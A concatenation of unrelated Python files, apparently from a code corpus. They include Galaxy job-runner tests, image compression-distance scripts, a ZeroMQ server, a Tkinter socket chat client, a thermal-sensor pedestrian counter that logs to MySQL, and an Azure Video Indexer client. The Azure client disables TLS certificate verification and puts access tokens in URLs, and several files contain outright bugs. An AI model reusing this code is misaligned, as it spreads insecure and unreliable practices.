runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert self.job_wrapper.stdout.strip() == "3"
def test_exit_code(self):
self.job_wrapper.command_line = '''sh -c "exit 4"'''
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert self.job_wrapper.exit_code == 4
def test_metadata_gets_set(self):
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert os.path.exists(self.job_wrapper.mock_metadata_path)
def test_metadata_gets_set_if_embedded(self):
self.job_wrapper.job_destination.params["embed_metadata_in_job"] = "True"
# Kill off cruft for _handle_metadata_externally and make sure job stil works...
self.job_wrapper.external_output_metadata = None
self.app.datatypes_registry.set_external_metadata_tool = None
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert os.path.exists(self.job_wrapper.mock_metadata_path)
def test_stopping_job(self):
self.job_wrapper.command_line = '''python -c "import time; time.sleep(15)"'''
runner = local.LocalJobRunner(self.app, 1)
def queue():
runner.queue_job(self.job_wrapper)
t = threading.Thread(target=queue)
t.start()
while True:
if self.job_wrapper.external_id:
break
time.sleep(.01)
external_id = self.job_wrapper.external_id
mock_job = bunch.Bunch(
get_external_output_metadata=lambda: None,
get_job_runner_external_id=lambda: str(external_id),
get_id=lambda: 1
)
runner.stop_job(mock_job)
t.join(1)
class MockJobWrapper(object):
def __init__(self, app, test_directory, tool):
working_directory = os.path.join(test_directory, "workdir")
tool_working_directory = os.path.join(working_directory, "working")
os.makedirs(tool_working_directory)
self.app = app
self.tool = tool
self.requires_containerization = False
self.state = model.Job.states.QUEUED
self.command_line = "echo HelloWorld"
self.environment_variables = []
self.commands_in_new_shell = False
self.prepare_called = False
self.write_version_cmd = None
self.dependency_shell_commands = None
self.working_directory = working_directory
self.tool_working_directory = tool_working_directory
self.requires_setting_metadata = True
self.job_destination = bunch.Bunch(id="default", params={})
self.galaxy_lib_dir = os.path.abspath("lib")
self.job_id = 1
self.external_id = None
self.output_paths = ['/tmp/output1.dat']
self.mock_metadata_path = os.path.abspath(os.path.join(test_directory, "METADATA_SET"))
self.metadata_command = "touch %s" % self.mock_metadata_path
self.galaxy_virtual_env = None
self.shell = "/bin/bash"
# Cruft for setting metadata externally, axe at some point.
self.external_output_metadata = bunch.Bunch(
set_job_runner_external_pid=lambda pid, session: None
)
self.app.datatypes_registry.set_external_metadata_tool = bunch.Bunch(
build_dependency_shell_commands=lambda: []
)
def prepare(self):
self.prepare_called = True
def set_job_destination(self, job_destination, external_id):
self.external_id = external_id
def get_command_line(self):
return self.command_line
def get_id_tag(self):
return "1"
def get_state(self):
return self.state
def change_state(self, state):
self.state = state
def get_output_fnames(self):
return []
def get_job(self):
return model.Job()
def setup_external_metadata(self, **kwds):
return self.metadata_command
def get_env_setup_clause(self):
return ""
def has_limits(self):
return False
def finish(self, stdout, stderr, exit_code):
self.stdout = stdout
self.stderr = stderr
self.exit_code = exit_code
|
generateDistanceMatrix.py | import math
import subprocess
import threading
import cv2
import numpy as np
import time
import os
from nvjpeg import NvJpeg
from ctypes import *
P = 8
def thread_function(name, folder):
global outputString, labels, files, P
N = len(files)
start = name * math.ceil((float)(N)/ P)
end = min(N,(name + 1) * math.ceil((float)(N) / P))
start_time = time.time()
for n in range(start, end, 1):
command = "wsl ncd -d " + folder + " -f "+folder + "/"+ files[n]
process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
output, error = process.communicate()
output = output.decode('utf-8')
labels[n] = files[n]
outputStringHelp1= output.split(' ')
outputStringHelp2 = np.array(outputStringHelp1[1:len(outputStringHelp1)-1])
for i in range(N):
outputString[i][n] = outputStringHelp2.astype(float)[i]
print("--- %s seconds ---" % (time.time() - start_time) + " Thread "+str(name))
return None
#plt.savefig('foo.png')
def NVCOMP(argv):
so_file = "dlls/FirstTryNvcomp.dll"
LP_c_char = POINTER(c_char)
LP_LP_c_char = POINTER(LP_c_char)
my_functions = CDLL(so_file)
my_functions.NCD_NVCOMP_2.argtypes = c_int,POINTER(POINTER(c_char))
my_functions.NCD_NVCOMP_2.restype = POINTER(POINTER(c_float))
p = (LP_c_char*len(argv))()
for i, arg in enumerate(argv):
enc_arg = arg.encode('utf-8')
p[i] = create_string_buffer(enc_arg)
na = cast(p, LP_LP_c_char)
entries = os.listdir(argv[0])
A= my_functions.NCD_NVCOMP_2(len(argv), na)
if A == None:
print('Error!')
return
arr = np.ctypeslib.as_array(A[0],(1,len(entries)))
for array in range(len(entries)-1):
arr = np.append(arr, np.ctypeslib.as_array(A[array+1],(1,len(entries))), axis = 0)
return arr
def FCD(argv):
so_file = "dlls/FCD.dll"
LP_c_char = POINTER(c_char)
LP_LP_c_char = POINTER(LP_c_char)
my_functions = CDLL(so_file)
my_functions.computeFCDMultithread.argtypes = c_int,POINTER(POINTER(c_char))
my_functions.computeFCDMultithread.restype = POINTER(POINTER(c_float))
p = (LP_c_char*len(argv))()
for i, arg in enumerate(argv):
enc_arg = arg.encode('utf-8')
p[i] = create_string_buffer(enc_arg)
na = cast(p, LP_LP_c_char)
entries = os.listdir(argv[0])
A= my_functions.computeFCDMultithread(len(argv), na)
arr = np.ctypeslib.as_array(A[0],(1,len(entries)))
for array in range(len(entries)-1):
arr = np.append(arr, np.ctypeslib.as_array(A[array+1],(1,len(entries))), axis = 0)
return arr
def NCD(folder):
global outputString, labels, files
for root, dirs, files in os.walk(folder):
outputString = np.zeros((len(files),len(files)), dtype=float)
labels = np.zeros((len(files),), dtype='U50')
threads = list()
for index in range(P):
x = threading.Thread(target=thread_function, args=(index,folder))
threads.append(x)
x.start()
for index, thread in enumerate(threads):
thread.join()
return outputString, labels
def NCD_Seq(folder):
folderName1 = folder
folderName2 = folder
command = "wsl ncd -c zlib -d " + folderName1 + " -d "+ folderName2
process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
output, error = process.communicate()
output = output.decode('utf-8')
outputList = output.split('\n')
labels = np.zeros((len(outputList)-1,), dtype='U50')
outputString = np.zeros((len(outputList)-1,len(outputList)-1), dtype=float)
for i in range(len(outputList)-1):
outputStringHelp1= outputList[i].split(' ')
labels[i] = outputStringHelp1[0]
outputStringHelp2 = np.array(outputStringHelp1[1:len(outputStringHelp1)-1])
outputString[i] = outputStringHelp2.astype(float)
return outputString, labels
def NVJPEG(folder):
nj = NvJpeg()
images =[]
for root, dirs, files in os.walk(folder):
for file in files:
images.append(cv2.imread(folder+"/"+file))
out_bytes = np.zeros((len(images), len(images)))
similarityMatrix = np.zeros((len(images), len(images)))
for i in range(len(images)):
for j in range(len(images)):
if i == j:
value = images[i]
out_bytes[i][j] = len(nj.encode(value))
else:
value = cv2.vconcat([images[i],images[j]])
out_bytes[i][j] = len(nj.encode(value))
for i in range(len(images)):
for j in range(len(images)):
if i == j:
similarityMatrix[i][j] = 0.0
else:
similarityMatrix[i][j] = (out_bytes[i][j] - min(out_bytes[i][j], out_bytes[j][j])) / max(out_bytes[i][i], out_bytes[j][j])
return similarityMatrix
def NCD_CLASS(folder, test):
folderName1 = test
folderName2 = folder
command = "wsl ncd -c zlib -d " + folderName2 + " -d "+ folderName1
process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
output, error = process.communicate()
output = output.decode('utf-8')
outputList = output.split('\n')
for root, dirs, files in os.walk(test):
sizeTest = len(files)
for root, dirs, files in os.walk(folder):
sizeTrain = len(files)
labels = np.zeros((sizeTest,), dtype='U50')
outputString = np.zeros((sizeTest, sizeTrain), dtype=float)
for i in range(sizeTest):
outputStringHelp1= outputList[i].split(' ')
labels[i] = outputStringHelp1[0]
outputStringHelp2 = np.array(outputStringHelp1[1:len(outputStringHelp1)-1])
outputString[i] = outputStringHelp2.astype(float)
return outputString, labels
|
run_server.py | from server.zmq_server import run_zmq_SUB_server, expire_box_set_members, media_sending_process
import multiprocessing
import zmq
import time
import configfile
import redis
if __name__ == '__main__':
try:
rdb = redis.StrictRedis(host=configfile.REDIS_HOST)
server_process = multiprocessing.Process(target=run_zmq_SUB_server, args=(rdb,))
expire_box_process = multiprocessing.Process(target=expire_box_set_members, args=(rdb,))
media_process = multiprocessing.Process(target=media_sending_process, args=(rdb,))
server_process.start()
media_process.start()
expire_box_process.start()
context = zmq.Context()
socket_sub = context.socket(zmq.SUB)
socket_pub = context.socket(zmq.PUB)
socket_sub.bind(configfile.ZMQ_XSUB_ADDRESS)
socket_sub.setsockopt(zmq.SUBSCRIBE, '')
socket_pub.bind(configfile.ZMQ_XPUB_ADDRESS)
time.sleep(configfile.ZMQ_SOCKET_BIND_TIME)
zmq.proxy(socket_pub, socket_sub)
except KeyboardInterrupt:
expire_box_process.terminate()
server_process.terminate()
media_process.terminate()
server_process.join()
media_process.join() |
Client.py | from socket import *
from threading import *
from tkinter import *
clientSocket = socket(AF_INET, SOCK_STREAM)
clientSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
hostIp = "127.0.0.1"
portNumber = 5050
clientSocket.connect((hostIp, portNumber))
window = Tk()
window.title("Connected To: "+ hostIp+ ":"+str(portNumber))
txtMessages = Text(window, width=50)
txtMessages.grid(row=0, column=0, padx=10, pady=10)
txtYourMessage = Entry(window, width=50)
txtYourMessage.insert(0,"Your message")
txtYourMessage.grid(row=1, column=0, padx=10, pady=10)
def sendMessage():
clientMessage = txtYourMessage.get()
txtMessages.insert(END, "\n" + "You: "+ clientMessage)
clientSocket.send(clientMessage.encode("utf-8"))
btnSendMessage = Button(window, text="Send", width=20, command=sendMessage)
btnSendMessage.grid(row=2, column=0, padx=10, pady=10)
def recvMessage():
while True:
serverMessage = clientSocket.recv(1024).decode("utf-8")
print(serverMessage)
txtMessages.insert(END, "\n"+serverMessage)
recvThread = Thread(target=recvMessage)
recvThread.daemon = True
recvThread.start()
window.mainloop()
|
common.py | import sys
from io import StringIO
def network_collapse(cluster):
i = 1
for obj in cluster:
obj.stop()
for obj in cluster:
obj.join()
print("Terminating model {0}...".format(i), end = "\r")
i += 1
print("\nAll models terminated")
def swap_in(stdout):
"""Swap in the current stdout object for one given as argument (requires that object to support read/write operations)."""
old = sys.stdout
sys.stdout = stdout
return old
def swap_out():
"""Swap out the current stdout object for a StringIO object."""
stdout = sys.stdout
sys.stdout = StringIO()
return stdout
def mean(lst):
return sum(lst)/len(lst)
##########################################
# Old Functions
#
def __send_shutdown(obj):
"""Remnant of the time when we had to send the Death Sequence to shut down peers."""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', obj.port))
s.send(obj.networker.death_sequence + b"\x02")
s.close()
print("Network is about to collapse...")
def prepare_logging_locations():
"""Logging location determination function from before the time we used logging from python's logger library."""
logfile, portfile = "/tmp/unisocket_logs", "/tmp/unisocket_port"
if os.name == "nt":
# Windows
logfile, portfile = "unisocket_logs", "unisocket_port"
elif os.name == "java":
# I have no fucken' idea. Android?
print("I don't know that system")
assert(False)
return portfile, logfile
def gen_payload(size):
# Most of our big payloads will have a lot of randomized junk...
# ...Yet most of our packets will be small
return os.urandom(size)
def old_build_network(start_port, total = None):
"""Defunct UniSocket network builder."""
models = []
ports = []
port = start_port
total = total or random.randrange(5, 10)
print("Starting from {0}".format(start_port))
for progress in range(total):
while True:
n = UnisocketModel(port, name = str(port-start_port)) # Should fail the first time
try:
n.start()
if len(ports) > 0:
rport = random.choice(ports)
tr = threading.Thread(target = __trigger_connection, args = (n, ("127.0.0.1", rport)))
tr.start()
print("Connecting {0} to {1}".format(port, rport))
ports.append(port)
models.append(n)
port += 1
print("Connected peer {0}/{1} ".format(progress+1, total), end = "\r")
except OSError:
n.stop() # FFS just let any ghost thread die, in case
port += 1
continue
else:
break
print("")
isolated = [x for x in models if len(x.peers) == 0]
print(ports)
print(isolated)
assert(len(isolated) == 0)
return models
|
uvicorn_server_context.py | import contextlib
import time
import threading
import uvicorn
import asyncio
# https://github.com/encode/uvicorn/issues/742
# provides easy to use context
# config = Config(app=app, port = os.environ.get('PORT', '8081'))
# server = UvicornServerContext(config)
# with server.run_in_thread():
# while True:
# time.sleep(1e-3)
class UvicornServerContext(uvicorn.Server):
def install_signal_handlers(self):
pass
@contextlib.contextmanager
def run_in_thread(self):
thread = threading.Thread(target=self.run)
thread.start()
try:
while not self.started:
time.sleep(1e-3)
yield
finally:
self.should_exit = True
thread.join()
|
process_shapenet.py | import open3d as o3d
import numpy as numpy
import glob
import os
from tqdm import tqdm
from multiprocessing import Pool
import multiprocessing
SHAPENET_ROOT="/home/daxuan/Dataset/ShapeNetCore.v2"
OUTPUT_PATH = "/home/daxuan/Dataset/off_files"
def get_shapenet_files(category):
files = glob.glob("%s/%s/**/models/*.obj" % (SHAPENET_ROOT, category), recursive=True)
return files
def convert_obj_off1(file_path):
try:
mesh_obj = o3d.io.read_triangle_mesh(file_path)
mesh_off = o3d.geometry.TriangleMesh()
mesh_off.vertices = mesh_obj.vertices
mesh_off.triangles = mesh_obj.triangles
o3d.io.write_triangle_mesh(os.path.join(OUTPUT_PATH, get_obj_file_name(file_path)), mesh_off)
except KeyboardInterrupt:
exit(0)
pass
except Exception as e:
print("Error processing: %s" % file_path)
def convert_obj_off(file_path):
if os.path.exists(os.path.join(OUTPUT_PATH, get_obj_file_name(file_path))):
return
print(file_path)
mesh_obj = o3d.io.read_triangle_mesh(file_path)
mesh_off = o3d.geometry.TriangleMesh()
mesh_off.vertices = mesh_obj.vertices
mesh_off.triangles = mesh_obj.triangles
o3d.io.write_triangle_mesh(os.path.join(OUTPUT_PATH, get_obj_file_name(file_path)), mesh_off)
def convert_obj_off_wrapper(file_path):
p = multiprocessing.Process(target=convert_obj_off, args=(file_path,))
p.start()
# Wait for 10 seconds or until process finishes
p.join(10)
# If thread is still active
if p.is_alive():
print("Killing %s" % file_path)
p.terminate()
p.join()
def get_obj_file_name(file_path):
return file_path.split("/")[-4]+"/"+file_path.split("/")[-3]+".off"
if __name__ == "__main__":
categories = ["02691156", "02933112", "03001627", "03636649", "04090263", "04379243", "04530566", "02828884", "02958343", "03211117", "03691459", "04256520", "04401088"]
files = []
for category in categories:
print("Working on %s..." % category)
if not os.path.exists(os.path.join(OUTPUT_PATH, category)):
os.system("mkdir -p %s" % os.path.join(OUTPUT_PATH, category))
files += get_shapenet_files(category)
pool = Pool(40)
for _ in tqdm(pool.imap_unordered(convert_obj_off, files), total=len(files)):
pass
pool.close()
pool.join()
|
thermal_save_mysql.py | import pygame
import os
import math
import time
from datetime import datetime, date
import numpy as np
from scipy.interpolate import griddata
from scipy import stats
import cv2
from colour import Color
from CentroidTracker import CentroidTracker
from multiprocessing import Process, active_children
import pexpect
import argparse
import busio
import board
import adafruit_amg88xx
import json
import gpsd
import threading
import sys
import RPi.GPIO as GPIO
from dragino import Dragino
import logging
from trackableobject import TrackableObject
import mysql.connector
from pytz import timezone
# some utility functions
def constrain(val, min_val, max_val):
return min(max_val, max(min_val, val))
def map_value(x, in_min, in_max, out_min, out_max):
return (x - in_min) * (out_max - out_min) / (in_max - in_min) + out_min
def mysql_save_insert(mysql_config, list):
sqlDate = datetime.now(timezone('America/Edmonton')).strftime('%Y-%m-%d %H:%M:%S')
conn = mysql.connector.connect(
host=mysql_config["host"],
user=mysql_config["user"],
passwd=mysql_config["passwd"],
database=mysql_config["database"]
)
cursor = conn.cursor()
sql = "INSERT INTO ped_count (count, device_id, description, time_stamp, latitude, longitude) VALUES (%s, %s, %s, %s, %s, %s)"
val = (payload['c'], mysql_config["device_id"],
mysql_config["description"], sqlDate, payload['a'], payload['o'])
try:
cursor.execute(sql, val)
conn.commit()
print("inserted values %s"%(str(val)))
except MySQLdb.IntegrityError:
print("failed to insert values %s"%(str(val)))
finally:
cursor.close()
conn.close()
def send_mysql(delay):
global payload
with open("mysql_config.json") as f:
mysql_config = json.load(f)
while True:
for child in active_children():
if child.name == 'mysql_proc':
child.terminate()
proc = Process(
target=mysql_save_insert, name='mysql_proc', args=(mysql_config, payload, ))
proc.start()
time.sleep(delay)
def count_within_range(list1, l, r):
'''
Helper function to count how many numbers in list1 falls into range [l,r]
'''
c = 0
# traverse in the list1
for x in list1:
# condition check
if x >= l and x <= r:
c += 1
return c
# a - latitude
# o - longitude
# c - count
payload = {'a': 53.539738, 'o': -113.489795, 'c': 0}
last_count = 0
def main():
global payload
# argument parsing
parser = argparse.ArgumentParser()
parser.add_argument(
'--headless', help='run the pygame headlessly', action='store_true')
parser.add_argument(
"--color_depth", help="integer number of colors to use to draw temps", type=int)
parser.add_argument(
'--max_temp', help='initial max temperature', type=int)
parser.add_argument(
'--ambient_offset', help='value to offset ambient temperature by to get rolling MAXTEMP', type=int)
parser.add_argument(
'--ambient_time', help='length of ambient temperature collecting intervals in seconds', type=int)
parser.add_argument(
'--blob_min_threshold', help='blod detection min threshold', type=int)
parser.add_argument(
'--blob_max_threshold', help='blod detection min threshold', type=int)
parser.add_argument(
'--blob_filterbyarea', help='blod detection filter by area', action='store_true')
parser.add_argument(
'--blob_min_area', help='blod detection filter by area min area', type=int)
parser.add_argument(
'--blob_filterbycircularity', help='blod detection filter by circularity', action='store_true')
parser.add_argument(
'--blob_min_circularity', help='blod detection filter by circularity min circularity', type=float)
parser.add_argument(
'--blob_filterbyconvexity', help='blod detection filter by convexity', action='store_true')
parser.add_argument(
'--blob_min_convexity', help='blod detection filter by convexity min convexity', type=float)
parser.add_argument(
'--blob_filterbyinertia', help='blod detection filter by inertia', action='store_true')
parser.add_argument(
'--blob_min_inertiaratio', help='blod detection filter by inertia inertia ratio', type=float)
parser.add_argument(
'--mysql_send_interval', help='length of intervals between attempted mysql insert in seconds', type=int)
args = parser.parse_args()
print(args)
i2c_bus = busio.I2C(board.SCL, board.SDA)
COLOR_DEPTH = args.color_depth
MAX_TEMP = args.max_temp
AMBIENT_OFFSET = args.ambient_offset
AMBIENT_TIME = args.ambient_time
BLOB_MIN_THRESHOLD = args.blob_min_threshold
BLOB_MAX_THRESHOLD = args.blob_max_threshold
BLOB_FILTERBYAREA = args.blob_filterbyarea
BLOB_MIN_AREA = args.blob_min_area
BLOB_FILTERBYCIRCULARITY = args.blob_filterbycircularity
BLOB_MIN_CIRCULARITY = args.blob_min_circularity
BLOB_FILTERBYCONVEXITY = args.blob_filterbyconvexity
BLOB_MIN_CONVEXITY = args.blob_min_convexity
BLOB_FILTERBYINERTIA = args.blob_filterbyinertia
BLOB_MIN_INERTIARATIO = args.blob_min_inertiaratio
MYSQL_SEND_INTERVAL = args.mysql_send_interval
if args.headless:
os.putenv('SDL_VIDEODRIVER', 'dummy')
else:
os.putenv('SDL_FBDEV', '/dev/fb1')
pygame.init()
# initialize the sensor
sensor = adafruit_amg88xx.AMG88XX(i2c_bus)
points = [(math.floor(ix / 8), (ix % 8)) for ix in range(0, 64)]
grid_x, grid_y = np.mgrid[0:7:32j, 0:7:32j]
# sensor is an 8x8 grid so lets do a square
height = 240
width = 240
# the list of colors we can choose from
black = Color("black")
colors = list(black.range_to(Color("white"), COLOR_DEPTH))
# create the array of colors
colors = [(int(c.red * 255), int(c.green * 255), int(c.blue * 255))
for c in colors]
displayPixelWidth = width / 30
displayPixelHeight = height / 30
lcd = pygame.display.set_mode((width, height))
lcd.fill((255, 0, 0))
pygame.display.update()
pygame.mouse.set_visible(False)
lcd.fill((0, 0, 0))
pygame.display.update()
# Setup SimpleBlobDetector parameters.
params = cv2.SimpleBlobDetector_Params()
# Change thresholds
if BLOB_MIN_THRESHOLD:
params.minThreshold = BLOB_MIN_THRESHOLD
if BLOB_MAX_THRESHOLD:
params.maxThreshold = BLOB_MAX_THRESHOLD
# Filter by Area.
if BLOB_FILTERBYAREA:
params.filterByArea = BLOB_FILTERBYAREA
params.minArea = BLOB_MIN_AREA
# Filter by Circularity
if BLOB_FILTERBYCIRCULARITY:
params.filterByCircularity = BLOB_FILTERBYCIRCULARITY
params.minCircularity = BLOB_MIN_CIRCULARITY
# Filter by Convexity
if BLOB_FILTERBYCONVEXITY:
params.filterByConvexity = BLOB_FILTERBYCONVEXITY
params.minConvexity = BLOB_MIN_CONVEXITY
# Filter by Inertia
if BLOB_FILTERBYINERTIA:
params.filterByInertia = BLOB_FILTERBYINERTIA
params.minInertiaRatio = BLOB_MIN_INERTIARATIO
# Set up the detector with default parameters.
detector = cv2.SimpleBlobDetector_create(params)
# initialize centroid tracker
ct = CentroidTracker()
# a dictionary to map each unique object ID to a TrackableObject
trackableObjects = {}
# the total number of objects that have moved either up or down
total_down = 0
total_up = 0
total_down_old = 0
total_up_old = 0
# let the sensor initialize
time.sleep(.1)
# press key to exit
screencap = True
# array to hold mode of last 10 minutes of temperatures
mode_list = []
send_thread = threading.Thread(
target=send_mysql, args=(MYSQL_SEND_INTERVAL,))
send_thread.start()
print('sensor started!')
while(screencap):
start = time.time()
# read the pixels
pixels = []
for row in sensor.pixels:
pixels = pixels + row
# payload['a'] = 0
# payload['o'] = 0
payload['c'] = ct.get_count_since_last_reading()
mode_result = stats.mode([round(p) for p in pixels])
mode_list.append(int(mode_result[0]))
# instead of taking the ambient temperature over one frame of data take it over a set amount of time
MAX_TEMP = float(np.mean(mode_list)) + AMBIENT_OFFSET
pixels = [map_value(p, mode_result[0] + 1, MAX_TEMP, 0,
COLOR_DEPTH - 1) for p in pixels]
# perform interpolation
bicubic = griddata(points, pixels, (grid_x, grid_y), method='cubic')
# draw everything
for ix, row in enumerate(bicubic):
for jx, pixel in enumerate(row):
try:
pygame.draw.rect(lcd, colors[constrain(int(pixel), 0, COLOR_DEPTH - 1)],
(displayPixelHeight * ix, displayPixelWidth * jx, displayPixelHeight, displayPixelWidth))
except:
print("Caught drawing error")
surface = pygame.display.get_surface()
myfont = pygame.font.SysFont("comicsansms", 25)
img = pygame.surfarray.array3d(surface)
img = np.swapaxes(img, 0, 1)
# Read image
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
img = cv2.bitwise_not(img)
# Detect blobs.
keypoints = detector.detect(img)
img_with_keypoints = cv2.drawKeypoints(img, keypoints, np.array(
[]), (0, 0, 255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
# draw a horizontal line in the center of the frame -- once an
# object crosses this line we will determine whether they were
# moving 'up' or 'down'
pygame.draw.line(lcd, (255, 255, 255),
(0, height // 2), (width, height // 2), 2)
pygame.display.update()
for i in range(0, len(keypoints)):
x = keypoints[i].pt[0]
y = keypoints[i].pt[1]
# print circle around blobs
pygame.draw.circle(lcd, (200, 0, 0), (int(
x), int(y)), round(keypoints[i].size), 2)
# update our centroid tracker using the detected centroids
objects = ct.update(keypoints)
# loop over the tracked objects
for (objectID, centroid) in objects.items():
# check to see if a trackable object exists for the current
# object ID
to = trackableObjects.get(objectID, None)
# if there is no existing trackable object, create one
if to is None:
to = TrackableObject(objectID, centroid)
# otherwise, there is a trackable object so we can utilize it
# to determine direction
else:
# the difference between the y-coordinate of the *current*
# centroid and the mean of *previous* centroids will tell
# us in which direction the object is moving (negative for
# 'up' and positive for 'down')
y = [c[1] for c in to.centroids]
direction = centroid[1] - np.mean(y)
to.centroids.append(centroid)
# check to see if the object has been counted or not
if not to.counted:
# if the direction is negative (indicating the object
# is moving up) AND the centroid is above the center
# line, count the object
# the historical centroid must present in the lower half of the screen
if direction < 0 and centroid[1] < height // 2 and count_within_range(y, height//2, height) > 0:
total_up += 1
to.counted = True
# if the direction is positive (indicating the object
# is moving down) AND the centroid is below the
# center line, count the object
# the historical centroid must present in the upper half of the screen
elif direction > 0 and centroid[1] > height // 2 and count_within_range(y, 0, height//2) > 0:
total_down += 1
to.counted = True
# store the trackable object in our dictionary
trackableObjects[objectID] = to
# update counter in top left
textsurface1 = myfont.render(
"IN: "+str(total_up), False, (255, 255, 255))
textsurface2 = myfont.render(
'OUT: '+str(total_down), False, (255, 255, 255))
lcd.blit(textsurface1, (0, 0))
lcd.blit(textsurface2, (0, 25))
total_up_old = total_up
total_down_old = total_down
pygame.display.update()
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
print('terminating...')
screencap = False
break
# for running the save on for a certain amount of time
# if time.time() - start_time >= 10:
# print('terminating...')
# screencap = False
# empty mode_list every AMBIENT_TIME *10 seconds to get current ambient temperature
if len(mode_list) > AMBIENT_TIME:
mode_list = []
time.sleep(max(1./25 - (time.time() - start), 0))
# Release everything if job is finished
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
|
azure_api.py | import os
import requests
import urllib3
import time
import threading
import subprocess
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
#This file is a video indexer API
import logging
logging.basicConfig(filename='./logs/example.log',level=logging.DEBUG)
#Log format
#logging.debug('This message should go to the log file')
#logging.info('So should this')
#logging.warning('And this, too')
class Video_Upload_API():
def __init__(self, account_id, subscription_key, account_type="trial"):
self.subscription_key = subscription_key
self.access_token = ""
self.account_type = account_type# also known as location in API
self.account_id = account_id
self.subscription_key = subscription_key
self.video_names = []
self.API_AUTH_URL = "https://api.videoindexer.ai/auth/{0}/Accounts/{1}".format(account_type, account_id)
self.API_VIDEO_URL = "https://api.videoindexer.ai/{0}/Accounts/{1}".format(account_type, account_id)
self.API_VIDEO_INDEX_URL = "https://api.videoindexer.ai/{0}/Accounts/".format(account_id)
def get_access_token(self):
querystring = {"allowEdit": "true"}
headers = {
'Ocp-Apim-Subscription-Key': self.subscription_key,
'Host': "api.videoindexer.ai"
}
url = '{0}/AccessToken'.format(self.API_AUTH_URL)
logging.info("calling: " + url)
response = requests.get(url, headers=headers, params=querystring, verify=False)
self.access_token = response.text.replace('"', '')
if len(self.access_token):
logging.info("Retrieved Access Token")
return self.access_token
def get_video_names(self):
url = "https://api.videoindexer.ai/{0}/Accounts/{1}/Videos?accessToken={2}".format(self.account_type,
self.account_id,
self.access_token)
json_videos = requests.get(url, verify=False)
for i in json_videos.json()["results"]:
video_name = str(i["name"])
if video_name not in self.video_names:
self.video_names.append(video_name)
def upload_video_file(self, video_name, file_path, language="auto", indexing_preset="AudioOnly",
streaming_preset="Default", replace = False):
if self.access_token == "":
self.get_access_token()
# Upload a video
upload_video_url = "{0}/Videos?accessToken={1}&name={2}&language={3}&indexingPreset={4}&streamingPreset={5}".format(
self.API_VIDEO_URL, \
self.access_token, video_name, language, indexing_preset, streaming_preset)
f = open(file_path, 'rb')
files = {'file': f}
headers = {'Host': 'api.videoindexer.ai'}
logging.info("Calling request to upload video ... " + file_path)
response = requests.post(upload_video_url, files=files, headers=headers, verify=False)
logging.info("Sent request for ... " + file_path)
if response.ok:
logging.info("Uploaded video ... determining status")
self.check_upload_status(response.json()["id"])
else:
logging.info("error: ")
logging.info(response.json())
#self.check_upload_status(response.json()['id'])
if "id" in response.json().keys():
return response.json()["id"] #returns video id
return "None"
def check_upload_status(self, upload_id):
result = {}
if upload_id:
progress_url = "{0}/Videos/{1}/Index?accessToken={2}".format(self.API_VIDEO_URL, upload_id,
self.access_token)
while True:
logging.info("Waiting for " + str(upload_id) + " to finish indexing")
time.sleep(2)
response = requests.get(progress_url, verify=False)
if 'state' in response.json().keys():
print(response.json()['state'])
if response.json()['state'] == 'Failed':
logging.info("Failed to upload video. Please try re-uploading")
break
if response.json()['state'] == 'Processed':
return 0
logging.info("*" * 10)
logging.info("The source language is: ")
result['lang'] = response.json()['videos'][0]['sourceLanguage']
logging.info(result['lang'])
response = requests.get(progress_url, verify=False)
logging.info(response.json()['videos'][0]['insights'].keys())
if 'sourceLanguageConfidence' in response.json()['videos'][0]['insights'].keys():
result['level'] = response.json()['videos'][0]['insights']['sourceLanguageConfidence']
logging.info("Source Language Confidence is: " + str(
response.json()['videos'][0]['insights']['sourceLanguageConfidence']))
else:
logging.info("Language confidence could not be determined.")
result['level'] = "Unknown"
break
else:
logging.info("State could not be found for " + upload_id + " " + str(response.json().keys()['Message']))
return result
def get_language(self, video_id = None): ## deprecated use new_get_language
if video_id == None:
logging.info("Error")
return 1
if not self.access_token:
self.get_access_token()
location = self.account_type
my_url = "https://api.videoindexer.ai/{0}/Accounts/{1}/Videos/{2}/Index?accessToken={3}&language=English".format(location, self.account_id, video_id, self.access_token)
response = requests.get(my_url, verify=False)
if(response.status_code != 200):
logging.info("Error Number: " + str(response.status_code))
logging.info(response.json())
x = response.json()
language = x["videos"][0]["insights"]["sourceLanguage"]
if "sourceLanguageConfidence" in x["videos"][0]["insights"].keys():
confidence = x["videos"][0]["insights"]["sourceLanguageConfidence"]
else:
confidence = None
logging.info("language: " + str(language) + "\naccuracy: " + str(confidence))
return language,confidence
#TODO: get the ids of just the files that have been indexed from the Wav-Clips
def get_video_ids(self):
if self.access_token == "":
self.get_access_token()
req = requests.get("https://api.videoindexer.ai/{0}/Accounts/{1}/Videos?accessToken={2}".format(self.account_type,self.account_id,self.access_token), verify = False)
Dict = {}
try:
for i in req.json()['results']:
Dict[str(i["id"])] = str(i["name"])
except:
print(req.json())
raise Exception
return Dict #returns Dictionary with format "id":"name of file"
if self.access_token == "":
self.get_access_token()
def new_get_video_ids(self):
if self.access_token == "":
self.get_access_token()
type = "LanguageDetection"
req = requests.get(
"https://api.videoindexer.ai/{0}/Accounts/{1}/Videos/{2}/ArtifactUrl?type={3}?accessToken={4}".format(self.account_type,self.account_id,video_id,type,self.access_token),
verify=False)
Dict = {}
# print(req.json()['results'])
for i in req.json()['results']:
Dict[str(i["id"])] = str(i["name"])
return Dict; # returns Dictionary with format "id":"name of file"
def new_get_language(self, video_id = None):
if video_id == None:
logging.debug("Error")
return 1
if not self.access_token:
self.get_access_token()
location = self.account_type
accountId = self.account_id
videoId = video_id
type = "LanguageDetection"
accessToken = self.access_token
response = requests.get(
"https://api.videoindexer.ai/{0}/Accounts/{1}/Videos/{2}/ArtifactUrl?type={3}&accessToken={4}".format(
location,accountId,videoId,type,accessToken), verify=False)
if response.status_code != 200:
